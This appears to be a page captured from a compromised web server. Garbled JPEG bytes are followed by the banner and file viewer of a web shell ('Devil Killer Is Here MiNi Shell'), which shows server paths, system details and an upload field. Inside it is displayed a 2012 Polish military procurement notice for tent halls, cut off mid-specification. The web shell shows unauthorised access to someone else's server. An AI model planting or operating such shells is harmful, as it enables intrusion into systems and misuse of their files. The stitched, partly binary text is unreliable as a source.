JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120213/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120213/42464-N-2012.html

<p class="kh_header"><b>Warszawa: Rozstawienie hal namiotowych wraz z wyposażeniem dla Potrzeb Dowództwa Operacyjnego Sił Zbrojnych</b><br>
<b>Numer ogłoszenia: 42464 - 2012; data zamieszczenia: 13.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 2063 , ul. Banacha 2, 00-909 Warszawa, woj. mazowieckie, tel. 22 6824215, 6824375, 6824121, faks 22 6824108.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamowienia.jw2063.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozstawienie hal namiotowych wraz z wyposażeniem dla Potrzeb Dowództwa Operacyjnego Sił Zbrojnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia w prowadzonym postępowaniu o udzielenie zamówienia publicznego jest Rozstawienie hal namiotowych wraz 
z wyposażeniem dla Potrzeb Dowództwa Operacyjnego Sił Zbrojnych 
(kod CPV: 79952000-2, 39522530-1). Przedmiot wyszczególniono 
w Formularzu cenowym - Oferta wykonawcy stanowiącym załącznik Nr 2 do SIWZ.
<br>2.	Wykonawca biorący udział w postępowaniu musi spełniać warunki określone w rozdz. V i VI SIWZ.
<br>3.	Zamówienie zostało podzielone na dwie następujące części:
-	Część I: Trening sztabowy CIS 12
-	Część II: Trening sztabowy MAJ 12
<br>4.	Zakres poszczególnych części zamówienia wygląda następująco:
Część I zamówienia Trening sztabowy CIS -12
<br>1)	Rodzaj i typ poszycia, konstrukcja oraz ilość i wielkość hal namiotowych:
	hale namiotowe wielosezonowe z dachem dwuspadowym;
	poszycie z plandeki typu PCV z materiału nie przepuszczającego światła blockout (trudnopalne i wodoodporne) - dopuszcza się możliwość zastosowania gali w kolorze czarnym w przypadku plandeki wykonanej 
z PCV przepuszczającej światło;
	kolor poszycia ciemny (w przypadku braku możliwości dopuszcza się kolor biały);
	ściany boczne bez okien;
	wejście do hal namiotowych od strony szczytowej z obu stron hali namiotowej,
	konstrukcja: profile aluminiowe lub stalowe, łączniki stalowe;
	ilość -  4 szt;
	wielkość - 10 m x 55 m (szerokość x długość) - 2200 m2;
	wysokość ścian nie mniejsza niż 2 - 2,5 m, wysokość 
w szczycie 4,5 - 5,5 m.
<br>2)	Rodzaj podłogi w halach namiotowych:
	podłoga systemowa, legary stalowe, deski strugane drewniana.
<br>3)	Rodzaj, typ i ilość oświetlenia w halach namiotowych:
	preferowane oświetlenie halogenowe - dopuszcza się możliwość zastosowania oświetlenia jarzeniowego;
	nie mniej niż 20 punktów świetlnych rozmieszczonych symetrycznie 
w dwóch rzędach po nie mniej niż 10 punktów w każdym z nich. 
<br>4)	Rodzaj, typ, kolor, wymiary i ilość ścianek działowych do wydzielenia miejsc pracy w 3 halach namiotowych:
	ścianki działowe w systemie oktagonalnym (ośmiokątnym);
	profil aluminiowy np. OCTANORM lub odpowiednik;
	ścianki pełne z płyt np. HDF obustronnie lakierowanej w kolorze białym;
	wymiary ścianek: ścianka o szerokości 1m, wysokość 2m;
	ilość zgodnie z oddzielnie przesłanym planem rozmieszczenia tj.:
-     164 ścianek w hali namiotowej nr 1;
-     123 ścianek w hali namiotowej nr 2;
-     124 ścianek w hali namiotowej nr 3;
	w każdej hali namiotowej jeden boks z drzwiami systemowymi zamykanymi na klucz.
<br>5)	Rodzaj ogrzewania hal namiotowych, wysokość temperatury wewnątrz hal namiotowych w dzień i w nocy oraz sposób jego rozliczenia:
	ogrzewanie hal - nagrzewnice;
	temperatura wewnątrz hal w dzień i w nocy 20 stopni C.
<br>6)	Instalacja elektryczna rozprowadzona w halach namiotowych umożliwiająca podłączenie zainstalowanego oświetlenia, 2 szt. nagrzewnic powietrza oraz:
-     100 odbiorników elektrycznych w hali namiotowej nr 1;
-     133 odbiorników elektrycznych w hali namiotowej nr 2;
-     134 odbiorników elektrycznych w hali namiotowej nr 3;
-      59 odbiorników elektrycznych w hali namiotowej nr 4.
<br>7)	Odległość do skrzynki z prądem do miejsca rozstawienia hal namiotowych - 35 m.
<br>8)	Obsługa hal namiotowych, nagrzewnic oraz instalacji elektrycznej 
i oświetleniowej po stronie wykonawcy.

<br>Część  II zamówienia Trening sztabowy MAJ-12
<br>1)	Rodzaj i typ poszycia, konstrukcja oraz ilość i wielkość hal namiotowych:
	wielosezonowe z dachem dwuspadowym;
	poszycie z plandeki typu PCV z materiału z nie przepuszczającego światła blockout (trudnopalne i wodoodporne) - dopuszcza się możliwość zastosowania gali w kolorze czarnym w przypadku plandeki wykonanej 
z PCV przepuszczającej światło;
	kolor poszycia ciemny (w przypadku braku możliwości dopuszcza się kolor biały);
	ściany boczne bez okien;
	wejście do hal namiotowych od strony szczytowej z obu stron hali namiotowej;
	konstrukcja: profile aluminiowe lub stalowe, łączniki stalowe;
	ilość -  4 szt 
	wielkość - 10 m x 55 m (szerokość x długość) - 2200 m2;
	wysokość ścian nie mniejsza niż 2 - 2,5 m, wysokość 
w szczycie 4,5 - 5,5 m.
<br>2)	Rodzaj podłogi w halach namiotowych:
	podłoga systemowa, legary stalowe, deski strugane drewniana.
<br>3)	Rodzaj, typ i ilość oświetlenia w halach namiotowych:
	preferowane oświetlenie halogenowe - dopuszcza się możliwość zastosowania oświetlenia jarzeniowego;
	nie mniej niż 20 punktów świetlnych rozmieszczonych symetrycznie 
w dwóch rzędach po nie mniej niż 10 punktów w każdym z nich. 
<br>4)	Rodzaj, typ, kolor, wymiary i ilość ścianek działowych do wydzielenia miejsc pracy w 3 halach namiotowych:
	ścianki działowe w systemie oktagonalnym (ośmiokątnym);
	profil aluminiowy np. OCTANORM lub odpowiednik;
	ścianki pełne z płyt np. HDF obustronnie lakierowanej w kolorze białym;
	wymiary ścianek: ścianka o szerokości 1m, wysokość 2m;
	ilość zgodnie z oddzielnie przesłanym planem rozmieszczenia tj.:
-     164 ścianek w hali namiotowej nr 1;
-     124 ścianek w hali namiotowej nr 2;
-     123 ścianek w hali namiotowej nr 3.
<br>5)	Rodzaj ogrzewania hal namiotowych, wysokość temperatury wewnątrz hal namiotowych w dzień i w nocy oraz sposób jego rozliczenia:
	ogrzewanie hal - nagrzewnice;
	temperatura wewnątrz hal w dzień i w nocy 20 stopni C.
<br>6)	Instalacja elektryczna rozprowadzona w halach namiotowych umożliwiająca podłączenie zainstalowanego oświetlenia, 2 szt. nagrzewnic powietrza oraz:
-     100 odbiorników elektrycznych w hali namiotowej nr 1;
-     133 odbiorników elektrycznych w hali namiotowej nr 2;
-     134 odbiorników elektrycznych w hali namiotowej nr 3;
-      59 odbiorników elektrycznych w hali namiotowej nr 4.
<br>7)	Odległość do skrzynki z prądem do miejsca rozstawienia hal namiotowych - 35 m.
<br>8)	Obsługa hal namiotowych, nagrzewnic oraz instalacji elektrycznej 
i oświetleniowej po stronie wykonawcy.
<br>5.	Dodatkowe informacje dotyczące organizacji pracy na terenie hal namiotowych:
<br>a)	Wykonawca minimum 7 dni przed rozpoczęciem prac związanych 
z wykonaniem każdej z części zamówienia prześle do JW. 2063 wykaz osób wraz z podanymi nr. PESEL oraz pojazdów z nr. rej. uczestniczących 
w zabezpieczeniu zamówienia.
<br>b)	Podczas realizacji poszczególnych części zamówienia osoby je wykonujące będą się poruszały po terenie zamkniętym ze wskazanymi osobami odpowiedzialnymi za dane przedsięwzięcie.
<br>c)	Miejsce pod rozstawienie hal namiotowych - stadion przy ulicy Radiowa 2 w Warszawie - ma nawierzchnię trawiastą.
<br>6.	Terminarz przygotowań poszczególnych części zamówienia wygląda następująco:

<br>Część I zamówienia Trening sztabowy CIS -12
<br>	12.04.2012 godz. 800 - oddane hale namiotowe ze ściankami działowymi, instalacją elektryczną oraz oświetleniem
<br>	13.04.2012 godz. 1000 - podłączenie ogrzewania hal namiotowych i rozpoczęcie ich ogrzewania
<br>	18.04.2012 godz. 800 - rozpoczęcie demontażu hal namiotowych

<br>Część II zamówienia Trening sztabowy MAJ-12
<br>	18.05.2012 godz. 800 - oddane hale namiotowe ze ściankami działowymi, instalacją elektryczną oraz oświetleniem
<br>	19.05.2012 godz. 1000 - podłączenie ogrzewania hal namiotowych i rozpoczęcie ich ogrzewania
<br>	25.05.2012 godz. 800 - rozpoczęcie demontażu hal namiotowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.20.00-2, 39.52.25.30-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p><br>- na potwierdzenie wiedzy i doświadczenia Zamawiający wymaga załączenia <b>wykazu wykonywanych usług (co najmniej 2 usług)</b> w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, na kwotę każdej dostawy nie mniejszą niż: 250.000,00 zł brutto (na formularzu określonym w zał. nr 4 do SIWZ), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane lub są wykonywane należycie;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p><br>- załączenia <b>opłaconej polisy</b>, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 250.000,00 zł, z udokumentowaniem jej opłacenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zamowienia.jw2063.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 2063, ul. S. Banacha 2, 00-909 Warszawa (na pisemny wniosek).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2012 godzina 08:45, miejsce: Jednostka Wojskowa 2063, ul. S. Banacha 2, 00-909 Warszawa (pok. 117 - kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Trening sztabowy CIS -12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Rodzaj i typ poszycia, konstrukcja oraz ilość i wielkość hal namiotowych:
	hale namiotowe wielosezonowe z dachem dwuspadowym;
	poszycie z plandeki typu PCV z materiału nie przepuszczającego światła blockout (trudnopalne i wodoodporne) - dopuszcza się możliwość zastosowania gali w kolorze czarnym w przypadku plandeki wykonanej 
z PCV przepuszczającej światło;
	kolor poszycia ciemny (w przypadku braku możliwości dopuszcza się kolor biały);
	ściany boczne bez okien;
	wejście do hal namiotowych od strony szczytowej z obu stron hali namiotowej,
	konstrukcja: profile aluminiowe lub stalowe, łączniki stalowe;
	ilość -  4 szt;
	wielkość - 10 m x 55 m (szerokość x długość) - 2200 m2;
	wysokość ścian nie mniejsza niż 2 - 2,5 m, wysokość 
w szczycie 4,5 - 5,5 m.
2)	Rodzaj podłogi w halach namiotowych:
	podłoga systemowa, legary stalowe, deski strugane drewniana.
3)	Rodzaj, typ i ilość oświetlenia w halach namiotowych:
	preferowane oświetlenie halogenowe - dopuszcza się możliwość zastosowania oświetlenia jarzeniowego;
	nie mniej niż 20 punktów świetlnych rozmieszczonych symetrycznie 
w dwóch rzędach po nie mniej niż 10 punktów w każdym z nich. 
4)	Rodzaj, typ, kolor, wymiary i ilość ścianek działowych do wydzielenia miejsc pracy w 3 halach namiotowych:
	ścianki działowe w systemie oktagonalnym (ośmiokątnym);
	profil aluminiowy np. OCTANORM lub odpowiednik;
	ścianki pełne z płyt np. HDF obustronnie lakierowanej w kolorze białym;
	wymiary ścianek: ścianka o szerokości 1m, wysokość 2m;
	ilość zgodnie z oddzielnie przesłanym planem rozmieszczenia tj.:
-     164 ścianek w hali namiotowej nr 1;
-     123 ścianek w hali namiotowej nr 2;
-     124 ścianek w hali namiotowej nr 3;
	w każdej hali namiotowej jeden boks z drzwiami systemowymi zamykanymi na klucz.
5)	Rodzaj ogrzewania hal namiotowych, wysokość temperatury wewnątrz hal namiotowych w dzień i w nocy oraz sposób jego rozliczenia:
	ogrzewanie hal - nagrzewnice;
	temperatura wewnątrz hal w dzień i w nocy 20 stopni C.
6)	Instalacja elektryczna rozprowadzona w halach namiotowych umożliwiająca podłączenie zainstalowanego oświetlenia, 2 szt. nagrzewnic powietrza oraz:
-     100 odbiorników elektrycznych w hali namiotowej nr 1;
-     133 odbiorników elektrycznych w hali namiotowej nr 2;
-     134 odbiorników elektrycznych w hali namiotowej nr 3;
-      59 odbiorników elektrycznych w hali namiotowej nr 4.
7)	Odległość do skrzynki z prądem do miejsca rozstawienia hal namiotowych - 35 m.
8)	Obsługa hal namiotowych, nagrzewnic oraz instalacji elektrycznej 
i oświetleniowej po stronie wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.20.00-2, 39.52.25.30-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Trening sztabowy MAJ-12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Rodzaj i typ poszycia, konstrukcja oraz ilość i wielkość hal namiotowych:
	wielosezonowe z dachem dwuspadowym;
	poszycie z plandeki typu PCV z materiału z nie przepuszczającego światła blockout (trudnopalne i wodoodporne) - dopuszcza się możliwość zastosowania gali w kolorze czarnym w przypadku plandeki wykonanej 
z PCV przepuszczającej światło;
	kolor poszycia ciemny (w przypadku braku możliwości dopuszcza się kolor biały);
	ściany boczne bez okien;
	wejście do hal namiotowych od strony szczytowej z obu stron hali namiotowej;
	konstrukcja: profile aluminiowe lub stalowe, łączniki stalowe;
	ilość -  4 szt 
	wielkość - 10 m x 55 m (szerokość x długość) - 2200 m2;
	wysokość ścian nie mniejsza niż 2 - 2,5 m, wysokość 
w szczycie 4,5 - 5,5 m.
2)	Rodzaj podłogi w halach namiotowych:
	podłoga systemowa, legary stalowe, deski strugane drewniana.
3)	Rodzaj, typ i ilość oświetlenia w halach namiotowych:
